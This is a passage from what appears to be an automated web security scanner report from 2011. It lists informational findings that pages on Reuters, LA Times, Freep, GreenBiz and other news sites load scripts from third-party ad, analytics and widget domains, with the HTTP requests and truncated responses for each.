GET /plugins/likebox.php?api_key=5597051e9d2034b294865dbb43c47ee0&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dffe70414%26origin%3Dhttp%253A%252F%252Fwww.charlotteobserver.com%252Ff3bf22f854%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&connections=0&header=true&height=62&href=http%3A%2F%2Fwww.facebook.com%2Fthecharlotteobserver&locale=en_US&sdk=joey&show_faces=false&stream=false&width=290 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.63.24.54
X-Cnection: close
Date: Sun, 04 Sep 2011 01:09:33 GMT
Content-Length: 8517

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="h
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/te2emPSgfVn.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yq/r/346Pl_u5ziA.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yn/r/fXOlnGV2onC.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/swbbSSZsgUH.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yC/r/vneZ6lOGBMV.js"></script>
...[SNIP]...

21.38. http://www.foxsportssouthwest.com/09/03/11/Longhorn-Network-on-the-air-and-out-of-s/landing_big12.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.foxsportssouthwest.com
Path:   /09/03/11/Longhorn-Network-on-the-air-and-out-of-s/landing_big12.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /09/03/11/Longhorn-Network-on-the-air-and-out-of-s/landing_big12.html HTTP/1.1
Host: www.foxsportssouthwest.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/1.0.3
Content-Type: text/html
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Sun, 04 Sep 2011 01:26:08 GMT
Date: Sun, 04 Sep 2011 01:26:08 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 42382

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>
<!--

fsn - -->
<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<link href="/commonCSS/component_v2_footer_bottomstrip.css?cachebust=1315099568" rel="stylesheet" type="text/css" >
<script language="javascript" src="http://wac.24C5.edgecastcdn.net/8024C5/platform/common/js/jquery-1.4.2.min.js" type="text/javascript" language="javascript1.2"></script>
...[SNIP]...
</script>-->

<script language="javascript" src="http://Ads1.msn.com/library/dap.js" type="text/javascript" language="javascript1.2"></script>
...[SNIP]...
<div id="udc">
<script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/jquery-1.3.2.min.js"></script>

<script type="text/javascript" src="http://blstj.msn.com/br/chan/udc/js/udctrack.2011.05.06.js"></script>
...[SNIP]...
</noscript>

<script type="text/javascript" src="http://msn.foxsports.com/fsn/msnSportsbar?msn=true&sportsBar=true&sportsBarSport=-1&fsnDomain=foxsportssouthwest"></script>
...[SNIP]...

21.39. http://www.freep.com/article/20110903/SPORTS07/109030443/Other-Michigan-State-athletes-fans-cheer-football

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freep.com
Path:   /article/20110903/SPORTS07/109030443/Other-Michigan-State-athletes-fans-cheer-football

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /article/20110903/SPORTS07/109030443/Other-Michigan-State-athletes-fans-cheer-football HTTP/1.1
Host: www.freep.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM"
Last-Modified: Sun, 04 Sep 2011 01:26:09 GMT
X-Processing-begin: MOC-WN0324, on site C4 (2011-09-03 21:26:09:818)
Content-Type: text/html
X-Processing-finished: MOC-WN0324, on site C4 (2011-09-03 21:26:09:943)
Content-Type: text/html; charset=iso-8859-1
Date: Sun, 04 Sep 2011 01:26:10 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 181668

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:meebo="http://www.meebo.com" lang="en">


<head>
       <title>Rokeyta Roberson: spar
...[SNIP]...
</div> <script type='text/javascript' src='http://static.eplayer.performgroup.com/flash/js/swfobject.js'></script><script type='text/javascript' src='http://static.eplayer.performgroup.com/flash/js/performgroup.js'></script>
...[SNIP]...

21.40. http://www.goutsa.com/ViewArticle.dbml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.goutsa.com
Path:   /ViewArticle.dbml

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /ViewArticle.dbml HTTP/1.1
Host: www.goutsa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:26:11 GMT
Server: Apache
P3P: policyref="http://www.goutsa.com/TermsAndConditions.dbml?DB_OEM_ID=13100", CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Content-Length: 68639
Vary: Accept-Encoding
Connection: close
Content-Type: text/html


       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Cache-Control" content="no-cache">
<meta http-equiv="Pragma
...[SNIP]...
<!-- start jquery -->

               <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.5/jquery.min.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="//secure-us.imrworldwide.com/v52.js"></script>
...[SNIP]...

21.41. http://www.greenbiz.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.greenbiz.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.greenbiz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Sun, 04 Sep 2011 01:26:12 GMT
Server: Apache/2.2.15 (EL)
X-Powered-By: PHP/5.2.16
Last-Modified: Sun, 04 Sep 2011 01:05:09 GMT
ETag: "e348a9db56d9d40996ad2334966342ce"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
X-Cache: MISS from localhost
X-Cache-Lookup: HIT from localhost:80
Via: 1.0 localhost:80 (squid/2.6.STABLE21)
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta http-
...[SNIP]...
</script><script type="text/javascript" src="http://img1.adjuggler.com/banners/ajtg.js"></script>
...[SNIP]...
</script><script type="text/javascript" language="JavaScript" src="http://img1.cdn.adjuggler.com/banners/ajtg.js"></script>
...[SNIP]...
</script><script type='text/javascript' language='JavaScript' src='http://img1.cdn.adjuggler.com/banners/ajtg.js'></script>
...[SNIP]...
in-bottom: 4px;" width="234" height="60" noresize scrolling=No frameborder=0 marginheight=0 marginwidth=0 src="http://ads.greenerworldmedia.com/servlet/ajrotator/253106/0/vh?z=greenbiz&amp;dim=219483"><script type="text/javascript" src="http://ads.greenerworldmedia.com/servlet/ajrotator/253106/0/vj?z=greenbiz&amp;dim=219483&amp;abr=$scriptiniframe"></script>
...[SNIP]...
<iframe width="300" height="250" noresize scrolling=No frameborder=0 marginheight=0 marginwidth=0 src="http://ads.greenerworldmedia.com/servlet/ajrotator/504627/0/vh?z=greenbiz&dim=412551"><script language=JavaScript src="http://ads.greenerworldmedia.com/servlet/ajrotator/504627/0/vj?z=greenbiz&dim=412551&abr=$scriptiniframe"></script>
...[SNIP]...
<iframe width="120" height="60" noresize scrolling=No frameborder=0 marginheight=0 marginwidth=0 src="http://ads.greenerworldmedia.com/servlet/ajrotator/283275/0/vh?z=greenbiz&dim=219482&kw=&click="><script language=JavaScript src="http://ads.greenerworldmedia.com/servlet/ajrotator/283275/0/vj?z=greenbiz&dim=219482&kw=&click=&abr=$scriptiniframe"></script>
...[SNIP]...
<div class="feed-content">
<script language=JavaScript src="http://ads.greenerworldmedia.com/servlet/ajrotator/391841/0/vj?z=greenbiz&dim=391839&total=20&adseparator=<BR><BR>"></script>
...[SNIP]...
</script>
<script src="http://www.surveymonkey.com/jsPop.aspx?sm=pB7bRgijiomDdE8hmU_2fvtA_3d_3d"> </script>
...[SNIP]...

21.42. http://www.latimes.com/sports/la-sp-0903-usc-charticle-20110903,0,2387944.story

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.latimes.com
Path:   /sports/la-sp-0903-usc-charticle-20110903,0,2387944.story

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /sports/la-sp-0903-usc-charticle-20110903,0,2387944.story HTTP/1.1
Host: www.latimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
P3P: policyref="http://www.latimes.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi TELi OUR DELa SAMi UNRi OTRi IND PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE"
Content-Type: text/html; charset=UTF-8
X-Instance-Name: i6s29z2n1
Last-Modified: Sun, 04 Sep 2011 01:26:14 GMT
Cache-Control: private, max-age=177
Date: Sun, 04 Sep 2011 01:26:15 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 207445


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transiti
...[SNIP]...
<div class="ad centerAd topLeaderboard">
           <script language="JavaScript" src="http://ad.doubleclick.net/adj/trb.latimes/sports;;ptype=s;slug=la-sp-0903-usc-charticle-20110903;rg=ur;pos=T;dcopt=ist;sz=728x90;tile=1;ca=Football;en=USCTrojans;at=Football;at=USCTrojans;at=MinnesotaGoldenGophers;at=NationalCollegiateAthleticAssociation;at=NationalFootballLeague;u=http://www.latimes.com/sports/la-sp-0903-usc-charticle-20110903,0,2387944.story;ord=64330800?" type="text/javascript"></script>
...[SNIP]...
<td vAlign="middle">

<script language="JavaScript" src="http://ad.doubleclick.net/adj/trb.latimes/sports;;ptype=s;slug=la-sp-0903-usc-charticle-20110903;rg=ur;pos=1;sz=300x250,336x280;tile=2;ca=Football;en=USCTrojans;at=Football;at=USCTrojans;at=MinnesotaGoldenGophers;at=NationalCollegiateAthleticAssociation;at=NationalFootballLeague;u=http://www.latimes.com/sports/la-sp-0903-usc-charticle-20110903,0,2387944.story;ord=64330800?" type="text/javascript"></script>
...[SNIP]...
<div class="skyScraper">
       
<script language="JavaScript" src="http://ad.doubleclick.net/adj/trb.latimes/sports;;ptype=s;slug=la-sp-0903-usc-charticle-20110903;rg=ur;pos=1;sz=160x600,300x600;tile=3;ca=Football;en=USCTrojans;at=Football;at=USCTrojans;at=MinnesotaGoldenGophers;at=NationalCollegiateAthleticAssociation;at=NationalFootballLeague;u=http://www.latimes.com/sports/la-sp-0903-usc-charticle-20110903,0,2387944.story;ord=64330800?" type="text/javascript"></script>
...[SNIP]...
</h5>
   <script src="http://bleacherreport.com/partner_feeds/latimes/widgets/sidebar.js"></script>
...[SNIP]...
<div class="ad centerAd">

<script language="JavaScript" src="http://ad.doubleclick.net/adj/trb.latimes/sports;;ptype=s;slug=la-sp-0903-usc-charticle-20110903;rg=ur;pos=B;sz=728x91;tile=4;ca=Football;en=USCTrojans;at=Football;at=USCTrojans;at=MinnesotaGoldenGophers;at=NationalCollegiateAthleticAssociation;at=NationalFootballLeague;u=http://www.latimes.com/sports/la-sp-0903-usc-charticle-20110903,0,2387944.story;ord=64330800?" type="text/javascript"></script>
...[SNIP]...
<div id="inlineHeaderAd" style="position:absolute; top: 35px; right: 10px; height: 64px;">
<script language="JavaScript" src="http://ad.doubleclick.net/adj/trb.latimes/sports;;ptype=s;slug=la-sp-0903-usc-charticle-20110903;rg=ur;pos=1;sz=234x60;tile=5;ca=Football;en=USCTrojans;at=Football;at=USCTrojans;at=MinnesotaGoldenGophers;at=NationalCollegiateAthleticAssociation;at=NationalFootballLeague;u=http://www.latimes.com/sports/la-sp-0903-usc-charticle-20110903,0,2387944.story;ord=64330800?" type="text/javascript"></script>
...[SNIP]...
<!-- Tacoda Javascript -->

<SCRIPT SRC="http://an.tacoda.net/an/g10007/slf.js" LANGUAGE="JavaScript"></SCRIPT>
...[SNIP]...
<!-- START REVENUE SCIENCE PIXELLING CODE -->
<script src="http://js.revsci.net/gateway/gw.js?csid=B08725"></script>
...[SNIP]...

21.43. http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.reuters.com
Path:   /article/2011/09/03/us-weather-football-idUSTRE78222D20110903

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /article/2011/09/03/us-weather-football-idUSTRE78222D20110903 HTTP/1.1
Host: www.reuters.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/trends/hottrends?q=notre+dame+football&date=2011-9-3&sa=X
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:44:41 GMT
Server: Apache
Expires: Sun, 4 Sep 2011 00:40:38 GMT
Last-UpdatedL: Sun, 04 Sep 2011 00:22:35 GMT
CHANNEL-NAME: domesticNews
Last-UpdatedA: Sat, 03 Sep 2011 23:10:32 GMT
Age: 242
Vary: Accept-Encoding
Content-Length: 91149
Content-Type: text/html;charset=UTF-8

<!--[if !IE]> This has been served from cache <![endif]-->
<!--[if !IE]> Request served from apache server: S264630NJ2XSF26 <![endif]-->
<!--[if !IE]> Cached on Sun, 04 Sep 2011 00:40:38 GMT and will
...[SNIP]...
<body>

<script src="http://www.nbcudigitaladops.com/hosted/global_header.js"></script>
...[SNIP]...
<li class="linkedIn " tns="no">
<script type="text/javascript" src="http://platform.linkedin.com/in.js"></script>
...[SNIP]...
</span>
<script src="http://cdn.echoenabled.com/clientapps/v2/jquery-plugins.js"></script>
<script src="http://cdn.echoenabled.com/clientapps/v2/stream.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://jlinks.industrybrains.com/jsct?sid=851&amp;ct=REUTERS_INVESTING&amp;tr=NEWS_MARKETS&amp;num=4&amp;layt=1&amp;fmt=simp"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="https://apis.google.com/js/plusone.js">
{"parsetags": "explicit"}
</script>
...[SNIP]...
</script>

<script src="http://www.nbcudigitaladops.com/hosted/global.js"></script>
...[SNIP]...

21.44. http://www.reuters.com/assets/commentsChild

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.reuters.com
Path:   /assets/commentsChild

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /assets/commentsChild?canonical_article_id=/article/2011/09/03/us-weather-football-idUSTRE78222D20110903&articleId=USTRE78222D20110903&headline=Notre+Dame+football+stadium+cleared+due+to+lightning&channel=domesticNews&edition=BETAUS&view=base HTTP/1.1
Host: www.reuters.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tns=dataSource=cookie

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:46:15 GMT
Server: Apache
Expires: Sun, 4 Sep 2011 00:41:45 GMT
Age: 270
Vary: Accept-Encoding
Content-Length: 5297
Content-Type: text/html;charset=UTF-8

<!--[if !IE]> This has been served from cache <![endif]-->
<!--[if !IE]> Request served from apache server: S264630NJ2XSF43 <![endif]-->
<!--[if !IE]> Cached on Sun, 04 Sep 2011 00:41:45 GMT and will
...[SNIP]...
<body>

<script src="http://www.nbcudigitaladops.com/hosted/global_header.js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://connect.facebook.net/en_US/all.js"></script>
...[SNIP]...

21.45. http://www.reuters.com/assets/newsFlash

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.reuters.com
Path:   /assets/newsFlash

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /assets/newsFlash HTTP/1.1
Host: www.reuters.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:26:32 GMT
Server: Apache
Expires: Sun, 4 Sep 2011 00:48:54 GMT
Last-UpdatedL: Sun, 04 Sep 2011 00:41:38 GMT
Vary: Accept-Encoding
Content-Length: 10201
Connection: close
Content-Type: text/html;charset=UTF-8

<!--[if !IE]> This has been served from cache <![endif]-->
<!--[if !IE]> Request served from apache server: S264630NJ2XSF14 <![endif]-->
<!--[if !IE]> Cached on Sun, 04 Sep 2011 00:48:53 GMT and will
...[SNIP]...
<body>

<script src="http://www.nbcudigitaladops.com/hosted/global_header.js"></script>
...[SNIP]...

21.46. http://www.reuters.com/assets/print

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.reuters.com
Path:   /assets/print

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /assets/print HTTP/1.1
Host: www.reuters.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:26:30 GMT
Server: Apache
Expires: Sun, 4 Sep 2011 01:22:47 GMT
Content-Length: 7735
Age: 222
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<!--[if !IE]> This has been served from cache <![endif]-->
<!--[if !IE]> Request served from apache server: S264630NJ2XSF37 <![endif]-->
<!--[if !IE]> Cached on Sun, 04 Sep 2011 01:22:47 GMT and will
...[SNIP]...
<body>

<script src="http://www.nbcudigitaladops.com/hosted/global_header.js"></script>
...[SNIP]...

21.47. http://www.reuters.com/do/emailArticle

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.reuters.com
Path:   /do/emailArticle

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /do/emailArticle HTTP/1.1
Host: www.reuters.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:27:03 GMT
Server: Apache-Coyote/1.1
Expires: Sun, 04 Sep 2011 01:32:03 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 5723
Vary: Accept-Encoding
Connection: close

<LINK href='/resources/css/rcom-master.css' type='text/css' rel='stylesheet'><script language='javascript' src='/resources/js/links.js' type='text/javascript'></script><meta http-equiv="Content-Type"
...[SNIP]...
</script>
<script type="text/javascript" src="http://api.recaptcha.net/challenge?k=6LeVRQsAAAAAAOTG4HWZ4aDI7ZHea-FLCdVGwyiC"></script>
...[SNIP]...

21.48. http://www.reuters.com/finance/markets/index

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.reuters.com
Path:   /finance/markets/index

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /finance/markets/index HTTP/1.1
Host: www.reuters.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:26:36 GMT
Server: Apache
Expires: Sun, 4 Sep 2011 00:55:51 GMT
Last-UpdatedL: Sun, 04 Sep 2011 00:04:41 GMT
Vary: Accept-Encoding
Content-Length: 95556
Connection: close
Content-Type: text/html;charset=UTF-8

<!--[if !IE]> This has been served from cache <![endif]-->
<!--[if !IE]> Request served from apache server: S264630NJ2XSF02 <![endif]-->
<!--[if !IE]> Cached on Sun, 04 Sep 2011 00:55:52 GMT and will
...[SNIP]...
<body>

<script src="http://www.nbcudigitaladops.com/hosted/global_header.js"></script>
...[SNIP]...
</script>

<script src="http://www.nbcudigitaladops.com/hosted/global.js"></script>
...[SNIP]...

21.49. http://www.reuters.com/news/archive/topNews

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.reuters.com
Path:   /news/archive/topNews

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /news/archive/topNews HTTP/1.1
Host: www.reuters.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:26:40 GMT
Server: Apache
Expires: Sun, 4 Sep 2011 00:48:55 GMT
Last-UpdatedL: Sun, 04 Sep 2011 00:41:38 GMT
Vary: Accept-Encoding
Content-Length: 55547
Connection: close
Content-Type: text/html;charset=UTF-8

<!--[if !IE]> This has been served from cache <![endif]-->
<!--[if !IE]> Request served from apache server: S264630NJ2XSF25 <![endif]-->
<!--[if !IE]> Cached on Sun, 04 Sep 2011 00:48:56 GMT and will
...[SNIP]...
</script>

<script src="http://www.nbcudigitaladops.com/hosted/global.js"></script>
...[SNIP]...

21.50. http://www.reuters.com/news/pictures/slideshow

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.reuters.com
Path:   /news/pictures/slideshow

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/pictures/slideshow HTTP/1.1
Host: www.reuters.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:26:41 GMT
Server: Apache
Expires: Sun, 4 Sep 2011 01:13:15 GMT
Last-UpdatedL: Sat, 03 Sep 2011 00:20:22 GMT
Vary: Accept-Encoding
Content-Length: 46712
Connection: close
Content-Type: text/html;charset=UTF-8

<!--[if !IE]> This has been served from cache <![endif]-->
<!--[if !IE]> Request served from apache server: S264630NJ2XSF37 <![endif]-->
<!--[if !IE]> Cached on Sun, 04 Sep 2011 01:13:15 GMT and will
...[SNIP]...
<body>

<script src="http://www.nbcudigitaladops.com/hosted/global_header.js"></script>
...[SNIP]...
<!-- Image Space Media Tag -->
<script src="http://services.picadmedia.com/js/clients/reuters.js" type="text/javascript">
</script>
...[SNIP]...
</script>

<script src="http://www.nbcudigitaladops.com/hosted/global.js"></script>
...[SNIP]...

21.51. http://www.reuters.com/news/video

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.reuters.com
Path:   /news/video

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/video HTTP/1.1
Host: www.reuters.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:26:38 GMT
Server: Apache
Expires: Sun, 4 Sep 2011 01:24:54 GMT
Age: 103
Vary: Accept-Encoding
Content-Length: 52644
Connection: close
Content-Type: text/html;charset=UTF-8

<!--[if !IE]> This has been served from cache <![endif]-->
<!--[if !IE]> Request served from apache server: S264630NJ2XSF01 <![endif]-->
<!--[if !IE]> Cached on Sun, 04 Sep 2011 01:24:54 GMT and will
...[SNIP]...
</style>

<script type="text/javascript" src="http://objects.tremormedia.com/embed/js/banners.js"></script>
...[SNIP]...
</script>
<script language="javascript" src="http://www.googletagservices.com/tag/static/google_services.js"></script>
...[SNIP]...
<body>

<script src="http://www.nbcudigitaladops.com/hosted/global_header.js"></script>
...[SNIP]...
<li class="linkedIn tns="no">
<script type="text/javascript" src="http://platform.linkedin.com/in.js"></script>
...[SNIP]...
</script>

<script src="http://www.nbcudigitaladops.com/hosted/global.js"></script>
...[SNIP]...

21.52. http://www.reuters.com/video/2011/06/08/dramatic-video-captures-toronto-lightnin

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.reuters.com
Path:   /video/2011/06/08/dramatic-video-captures-toronto-lightnin

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /video/2011/06/08/dramatic-video-captures-toronto-lightnin HTTP/1.1
Host: www.reuters.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 01:27:01 GMT
Server: Apache-Coyote/1.1
Expires: Sun, 04 Sep 2011 01:32:01 GMT
Last-UpdatedL: Sat, 03 Sep 2011 23:24:59 GMT
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Connection: close
Content-Length: 44160

<!--[if !IE]> App Server /S264630NJ2XSF54/ <![endif]-->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns
...[SNIP]...
<body>

<script src="http://www.nbcudigitaladops.com/hosted/global_header.js"></script>
...[SNIP]...
</script>

<script src="http://www.nbcudigitaladops.com/hosted/global.js"></script>
...[SNIP]...

21.53. http://www.reuters.com/video/2011/08/08/england-football-friendly-cancelled-afte

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.reuters.com
Path:   /video/2011/08/08/england-football-friendly-cancelled-afte

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /video/2011/08/08/england-football-friendly-cancelled-afte HTTP/1.1
Host: www.reuters.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 01:27:00 GMT
Server: Apache-Coyote/1.1
Expires: Sun, 04 Sep 2011 01:32:00 GMT
Last-UpdatedL: Sat, 03 Sep 2011 23:24:59 GMT
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Connection: close
Content-Length: 44160

<!--[if !IE]> App Server /S264630NJ2XSF54/ <![endif]-->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns
...[SNIP]...
<body>

<script src="http://www.nbcudigitaladops.com/hosted/global_header.js"></script>
...[SNIP]...
</script>

<script src="http://www.nbcudigitaladops.com/hosted/global.js"></script>
...[SNIP]...

21.54. http://www.reuters.com/video/2011/08/15/football-gains-level-playing-field

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.reuters.com
Path:   /video/2011/08/15/football-gains-level-playing-field

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /video/2011/08/15/football-gains-level-playing-field HTTP/1.1
Host: www.reuters.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 01:27:00 GMT
Server: Apache-Coyote/1.1
Expires: Sun, 04 Sep 2011 01:32:01 GMT
Last-UpdatedL: Sat, 03 Sep 2011 23:24:59 GMT
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Connection: close
Content-Length: 44160

<!--[if !IE]> App Server /S264630NJ2XSF60/ <![endif]-->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns
...[SNIP]...
<body>

